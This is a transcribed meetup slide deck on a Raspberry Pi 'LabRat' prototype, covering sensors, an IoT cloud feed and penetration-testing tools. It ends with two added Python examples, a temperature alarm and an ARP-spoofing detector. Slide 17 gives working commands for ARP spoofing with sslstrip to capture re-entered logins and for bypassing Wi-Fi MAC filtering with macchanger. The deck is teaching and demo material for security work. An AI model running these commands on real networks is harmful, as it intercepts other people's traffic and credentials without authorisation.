The LabRat - Physical backdoor hacks and IOT primer

null Bangalore Chapter - July 2013 Meet

Published in: Education, Technology

  1. The LabRat: Physical Backdoor Hacks and Internet of Things (IOT) Primer. Akshat Sharma, TME, Cisco Systems.
  2. The Raspberry Pi
     - http://www.raspberrypi.org/downloads (image downloads and updates)
     - http://elinux.org/RPi_Low-level_peripherals (working with GPIO)
     - http://elinux.org/RPiconfig (interfacing with screens)
     - Google's your best friend
  3. Raspberry Pi as a Physical Backdoor into your network
     http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
     It's a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello
     - Rogue APs
     - MAC spoofing on wired networks
     - MITM attacks
  4. The LabRat Circuit [circuit diagram; labels: Temperature Sensor, Humidity Sensor, Optical Fiber Tester; CH0, CH1, CH2, CH3; CLK, CS (AL), MOSI, MISO; IR LED - Receiver (two), Optical Fiber, Binary Signal In (two)]
  5. The LabRat - a Proof of Concept Prototype. The Raspberry Pi: a $35 Linux computer that powers the LabRat prototype. To get more info on the Raspberry Pi, visit http://www.raspberrypi.org/
  6. The LabRat Prototype: Current Setup
     - 10 inch capacitive touchscreen
     - Optical fiber tester
     - Humidity sensor
     - Temperature sensor
     - Raspberry Pi
     - HDMI-to-LVDS converter board
     - 10,000 mAh lithium polymer battery
  7. The LabRat Prototype: LM 35 + ADS7841 Temperature Sensor [photo; labels: LM 35 temperature sensor, ADS7841 analog to digital converter]
  8. The LabRat Prototype: Humidity Sensor SMD + ADS7841 [photo; labels: ADS7841 analog to digital converter, humidity sensor SMD]
  9. The LabRat Prototype: Optical Fiber Tester [photo; labels: optical fiber holders, infra-red LED-receiver combination to transmit messages via the fiber]
  10. Connecting to an IOT Cloud
      - https://xively.com/
      - Formerly Cosm, Pachube
  11. Set up a Cosm (Now Xively) Account
      - Register on Cosm (Xively) and add a device
      - You will receive an API key and feed ID
      - Now use the old Cosm eeml library to set up datastreams from the Raspberry Pi
  12. Setting up the Python Script to send Data to Xively

      Install the EEML package from GitHub:

          sudo apt-get install python-dev
          sudo apt-get install python-pip
          sudo easy_install -U distribute
          sudo pip install rpi.gpio    # to work with the RPi GPIO pins
          wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
          tar zxvf geekman-python-eeml.tar.gz
          cd geekman-python-eeml*
          sudo python setup.py install

      Set up the Python script:

          # source eeml package
          import eeml
          # <snip>
          API_KEY = 'YOUR_API_KEY'
          FEED = YOUR_FEED_ID    # placeholder: replace with your numeric feed ID
          API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
  13. The LabRat Prototype: Online Real-Time Feed (Temperature and Humidity). Visit the real-time feed at https://cosm.com/feeds/89297
  14. The LabRat Prototype: Python Scripts
      1) Python script to upload the temperature and humidity data to an online cloud-based feed, showing how the LabRat may, in the future, do the same with sensor data at customer labs to provide real-time analytics.
      2) The same Python script sends an email to lab admins whenever the temperature or humidity values exceed a pre-decided threshold.
      3) Another Python script sends messages (binary data) through an optical fiber using an infrared LED-receiver combination and emails the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
  15. The LabRat Prototype: Current List of Penetration-Testing Tools
      - Information Gathering: wireshark, tcpflow, ngrep, hostmap, kismet, btscanner, sslscan, sslstrip, sslsniff, ssldump, tcptraceroute, netmask, tcpdump, zenmap, nmap, arp-fingerprint, dnswalk, dnstracer
      - Vulnerability Assessment: airodump-ng, sqlmap, nikto, svcrack
      - Exploitation Tools: aircrack-ng, airmon-ng, airodump-ng, aireplay-ng, sqlninja, exploit-db
      - Privilege Escalation: wireshark, ettercap, tcpreplay, tcpick, packit, packeth, dsniff
      - Maintaining Access: ptunnel, netcat, ftp-proxy, udp-tunnel, proxychains, dns2tcp
  16. DEMO
      - ARP spoofing using sslstrip and arpspoof
      - MAC spoofing using airmon-ng and macchanger
      - Packet sniffing using Wireshark
      - Other MITM attacks
  17. ARP Spoofing and MAC Spoofing Attacks

      ARP spoofing
      - Set up port forwarding:

          iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
          echo '1' > /proc/sys/net/ipv4/ip_forward

      - Start ARP spoofing. Spoof the gateway:

          arpspoof -i wlan0 <gateway address>

      - Start sslstrip and log user information (use the -k option to log users out of their current sessions, forcing them to re-login):

          sslstrip -k -l 8080

      MAC spoofing on Wi-Fi (how to bypass MAC filtering)
      - ifconfig eth0 down
      - airmon-ng start wlan0
      - iwlist wlan0 scanning
      - airodump-ng -c 6 -a --bssid <mac address of wireless access point> (gives info on connected devices)
      - ifconfig wlan0 down
      - Now use macchanger
      - macchanger -m <mac of allowed devices> wlan0
      - ifconfig wlan0 up
  18. Putting The Internet of Things into Perspective. Co-incidental Cisco Plugin :p
  19. Thank You
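
Slide 14 describes a script that emails lab admins when a reading crosses a threshold. The sketch below is an added example, not the script from the talk: it converts a 12-bit ADS7841 reading of the LM35 output to degrees Celsius and emits one message per alarm transition, using hysteresis so a value hovering at the limit does not flood the mailbox. The 3.3 V reference, the thresholds, the function names and the sample readings are assumptions.

```python
from email.message import EmailMessage

VREF_VOLTS = 3.3          # assumed ADC reference voltage (not given on the slides)
ADC_STEPS = 4096          # 12-bit conversion result from the ADS7841
LM35_VOLTS_PER_C = 0.010  # LM35 scale factor: 10 mV per degree Celsius


def counts_to_celsius(counts):
    """Convert a raw 12-bit ADC reading of the LM35 output to degrees Celsius."""
    if not 0 <= counts < ADC_STEPS:
        raise ValueError(f"ADC reading out of range: {counts}")
    return counts * VREF_VOLTS / ADC_STEPS / LM35_VOLTS_PER_C


class ThresholdAlarm:
    """Raise once at or above high_c, clear only below clear_c (hysteresis)."""

    def __init__(self, high_c, clear_c):
        if clear_c >= high_c:
            raise ValueError("clear_c must be below high_c")
        self.high_c, self.clear_c, self.active = high_c, clear_c, False

    def update(self, temp_c):
        if not self.active and temp_c >= self.high_c:
            self.active = True
            return "raised"
        if self.active and temp_c < self.clear_c:
            self.active = False
            return "cleared"
        return None


def build_alert(event, temp_c, sender, recipients):
    """Build (but do not send) the notification for one alarm transition."""
    msg = EmailMessage()
    msg["Subject"] = f"LabRat temperature alarm {event}: {temp_c:.1f} C"
    msg["From"] = sender
    msg["To"] = ", ".join(recipients)
    msg.set_content(f"Temperature alarm {event} at {temp_c:.1f} C.")
    return msg


def alerts_for(readings, alarm, sender, recipients):
    """Return one message per alarm transition in a series of raw ADC readings."""
    out = []
    for counts in readings:
        temp_c = counts_to_celsius(counts)
        event = alarm.update(temp_c)
        if event:
            out.append(build_alert(event, temp_c, sender, recipients))
    return out


# Constructed readings: below limit, two above, dip inside the band, clear, above again.
SAMPLE_COUNTS = [360, 400, 405, 380, 340, 401]
```

Each returned message can be handed to `smtplib.SMTP.send_message`; the six sample readings produce three messages (raised, cleared, raised) rather than one per high reading.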
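
A defender-side counterpart to the gateway spoofing on slide 17, added here and not part of the original deck: a passive monitor that takes observed ARP replies and flags the two symptoms that spoofing leaves on the wire, a known IP (such as the gateway) suddenly answering from a different MAC, and one MAC answering for several IPs. The addresses, the sample replies and all names are constructed for illustration.

```python
from collections import defaultdict, namedtuple

Finding = namedtuple("Finding", "ts kind ip detail")

# Constructed sample (not from the talk): ARP replies as (seconds, sender IP, sender MAC).
SAMPLE_REPLIES = [
    (0.0, "192.168.1.1",  "AA:BB:CC:00:00:01"),  # gateway, legitimate
    (1.0, "192.168.1.23", "aa:bb:cc:00:00:17"),  # ordinary host
    (2.0, "192.168.1.50", "de:ad:be:ef:00:99"),  # host that later spoofs
    (5.0, "192.168.1.1",  "de:ad:be:ef:00:99"),  # gateway IP claimed by .50's MAC
    (5.5, "192.168.1.1",  "de:ad:be:ef:00:99"),  # repeated spoofed reply
    (6.0, "192.168.1.23", "aa:bb:cc:00:00:17"),  # unchanged binding
]


def detect_arp_anomalies(replies, pinned=None):
    """Return Findings for changed IP->MAC bindings and MACs answering for several IPs.

    pinned: optional {ip: mac} of bindings known to be good (e.g. the gateway);
    any other IP is trusted on first sight.
    """
    bindings = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)
    findings, reported = [], set()

    def report(ts, kind, ip, detail):
        if (kind, ip, detail) not in reported:      # one finding per distinct event
            reported.add((kind, ip, detail))
            findings.append(Finding(ts, kind, ip, detail))

    for ts, ip, mac in replies:
        mac = mac.lower()
        known = bindings.setdefault(ip, mac)        # first sighting becomes the baseline
        if known != mac:                            # baseline is kept, never overwritten
            report(ts, "binding-changed", ip, f"{known} -> {mac}")
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1:
            report(ts, "mac-claims-multiple-ips", ip, mac)
    return findings


if __name__ == "__main__":
    for f in detect_arp_anomalies(SAMPLE_REPLIES):
        print(f"{f.ts:>5.1f}s {f.kind:<24} {f.ip:<13} {f.detail}")
```

Pinning the gateway binding avoids trusting a spoofed reply seen first; hosts that legitimately hold several addresses will trigger the second rule and need an allow-list.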
